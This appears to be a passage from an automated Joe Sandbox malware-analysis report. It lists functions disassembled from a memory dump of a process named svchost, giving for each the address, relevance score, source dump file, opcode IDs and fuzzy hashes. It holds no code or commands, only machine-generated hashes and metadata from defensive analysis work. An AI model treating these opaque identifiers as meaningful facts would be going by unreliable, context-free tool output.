                                                                    • Instruction Fuzzy Hash: 72210732A086554FD301FB7CE8612E9BBA0FF82365B444677C089DB293DF28741687D5
                                                                    Function 00007FF7C0CF0985 Relevance: .3, Instructions: 339COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000017.00000002.2361315261.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_23_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d6934cf3b05a1a92cb37a98eccb84eac292a340ec5fa96a54ef9fd3fb21dadc9
                                                                    • Instruction ID: 93dde528401a92248682fe63f526b5ba4aa84cdf63a3abd38b7b962a183570c0
                                                                    • Opcode Fuzzy Hash: d6934cf3b05a1a92cb37a98eccb84eac292a340ec5fa96a54ef9fd3fb21dadc9
                                                                    • Instruction Fuzzy Hash: 40A12676B08A164FD701BB7CB8522F97BA0EF853B1B544577C148CB293CA24B09AC7D1
                                                                    Function 00007FF7C0CF09D3 Relevance: .3, Instructions: 313COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000017.00000002.2361315261.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_23_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 18abef1a91f2fde63f0b1f1ef73c0ec36a0da9ae6195d08a529617006cbed3b5
                                                                    • Instruction ID: fcf8b40e5ead0297095bc63d5e3c6e0f07cd35b975a52cda7e747031922ed78f
                                                                    • Opcode Fuzzy Hash: 18abef1a91f2fde63f0b1f1ef73c0ec36a0da9ae6195d08a529617006cbed3b5
                                                                    • Instruction Fuzzy Hash: 61914566B0891A4BD700BB7CB8522FD7BA0EF853B1B548677C148CB293CA35B096C7D1
                                                                    Function 00007FF7C0CF0A08 Relevance: .3, Instructions: 297COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000017.00000002.2361315261.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_23_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0a90b5ca648525026138e812a98bc18071a9c61d3dddffb296a0669a38dfeba3
                                                                    • Instruction ID: 1175101fc186ffaedb7e525637eb79575c21e5dab3a18f5c44512632e0497379
                                                                    • Opcode Fuzzy Hash: 0a90b5ca648525026138e812a98bc18071a9c61d3dddffb296a0669a38dfeba3
                                                                    • Instruction Fuzzy Hash: 7F814576B0891A4BD701BB7CB8522F97BA4EF853B1B548677C148CB293CA34B096C7D1
                                                                    Function 00007FF7C0CF0A10 Relevance: .3, Instructions: 294COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000017.00000002.2361315261.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_23_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6ef7222a26491fbfacd3fb27befe985a59c5d745261600e5b94124d0ce95c655
                                                                    • Instruction ID: 206696986957363ac9076b20284af8c0592fb32b011d6e0d9bdb65961cdacd08
                                                                    • Opcode Fuzzy Hash: 6ef7222a26491fbfacd3fb27befe985a59c5d745261600e5b94124d0ce95c655
                                                                    • Instruction Fuzzy Hash: 30814476B0891A4BD700BB7CB8122F97BA4EF853B1B548677C108CB293CA34B096C7D1
                                                                    Function 00007FF7C0CF0A48 Relevance: .3, Instructions: 263COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000017.00000002.2361315261.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_23_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 038ef247ef4af09d471ce86fb8db57da2205208429a044de20e70ce4dfc542ca
                                                                    • Instruction ID: 48f3a6669f3c773bf41f8aad2b0812563c19cd066f04995f9633a38b5596b11b
                                                                    • Opcode Fuzzy Hash: 038ef247ef4af09d471ce86fb8db57da2205208429a044de20e70ce4dfc542ca
                                                                    • Instruction Fuzzy Hash: B8712676B0891A4BD701BB7CB8522E97BA4EF893B1B584676D108C7293CA34B056C7D1
                                                                    Function 00007FF7C0CF0638 Relevance: .1, Instructions: 137COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000017.00000002.2361315261.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_23_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: da2109508978514f9a1412c6fb430eeb7e729f8096536e5e8d9cdd68be55c7c0
                                                                    • Instruction ID: e2dda225de4eb077f3598b9584316a7331aee5b2f80bfa125f1f4f49f2b86495
                                                                    • Opcode Fuzzy Hash: da2109508978514f9a1412c6fb430eeb7e729f8096536e5e8d9cdd68be55c7c0
                                                                    • Instruction Fuzzy Hash: 0831B520B18D490FE798EB6C9459779B6C2EF99365F4402BEE40EC3293DE64AC428341
                                                                    Function 00007FF7C0CF0D21 Relevance: .1, Instructions: 128COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000017.00000002.2361315261.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_23_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1fd8bcad5b3637168a2c0577099f7fd069766d0b311cd2ffc7ffc1e7ad3764dd
                                                                    • Instruction ID: 214d573e6046248d1f216fa0e5bd2fe39fb2da46c0c8e9a21704af53be126d02
                                                                    • Opcode Fuzzy Hash: 1fd8bcad5b3637168a2c0577099f7fd069766d0b311cd2ffc7ffc1e7ad3764dd
                                                                    • Instruction Fuzzy Hash: 4A31A361B18A094FE744BBBC581A7FDB6D5EF98761F54427AE10DC3283DE28B8418392
                                                                    Function 00007FF7C0CF0BD3 Relevance: .1, Instructions: 120COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000017.00000002.2361315261.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_23_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5d125fe127ac39040287a6603ac1838edde35177ef7092bb2e3121705610a252
                                                                    • Instruction ID: 3cc22c291ac4a535faeac8253b2c0ab101dec7225604239ba0b03d172ff8f94e
                                                                    • Opcode Fuzzy Hash: 5d125fe127ac39040287a6603ac1838edde35177ef7092bb2e3121705610a252
                                                                    • Instruction Fuzzy Hash: F8418171E19A0D8FDB44EB6898656EDBBB1FF99311F540579D009C3392CE38A805C792
                                                                    Function 00007FF7C0CF0858 Relevance: .1, Instructions: 88COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000017.00000002.2361315261.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_23_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5c64c6b236e0edc66699cef7c263a3a3c3aa2c304d0025fccaa7f032a0c0c134
                                                                    • Instruction ID: b68e22394e2b1644499c33b95035e4a999522cbb79abf8e062a06312f6d70bf1
                                                                    • Opcode Fuzzy Hash: 5c64c6b236e0edc66699cef7c263a3a3c3aa2c304d0025fccaa7f032a0c0c134
                                                                    • Instruction Fuzzy Hash: A231CFA1E5964E5FD340EF2C98B15AABFB1EF8D320B8985A9D008C3387CF346810C752
                                                                    Function 00007FF7C0CF0870 Relevance: .1, Instructions: 77COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000017.00000002.2361315261.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_23_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 33ff3e1c08b8e5d4dc31b14a1ac5354b37b66abff861a7e6ec8f933ab8a24ca4
                                                                    • Instruction ID: d2721e2f25c659ddeff2fe2acda07b3904105a2f4168b56d872a5bb1f90449f4
                                                                    • Opcode Fuzzy Hash: 33ff3e1c08b8e5d4dc31b14a1ac5354b37b66abff861a7e6ec8f933ab8a24ca4
                                                                    • Instruction Fuzzy Hash: 46219EA0E5964D5FD340EF2C98B15AABF71EB8C321B8985A9E409C3386CF346910C752
                                                                    Function 00007FF7C0CF22C1 Relevance: .0, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000017.00000002.2361315261.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_23_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 88a5e78df1b0b33dd3cdfe80057264309a48b6c5f8a85df7562c59e15cdce51d
                                                                    • Instruction ID: b5b655c038441d322cbc0097216fe2b02e547929c021e8b8739f630ea19058bb
                                                                    • Opcode Fuzzy Hash: 88a5e78df1b0b33dd3cdfe80057264309a48b6c5f8a85df7562c59e15cdce51d
                                                                    • Instruction Fuzzy Hash: 2D014E55D0D6C10FE751BB385865176BFE0DF95220B8C04AAD988C72E7DD18F9458393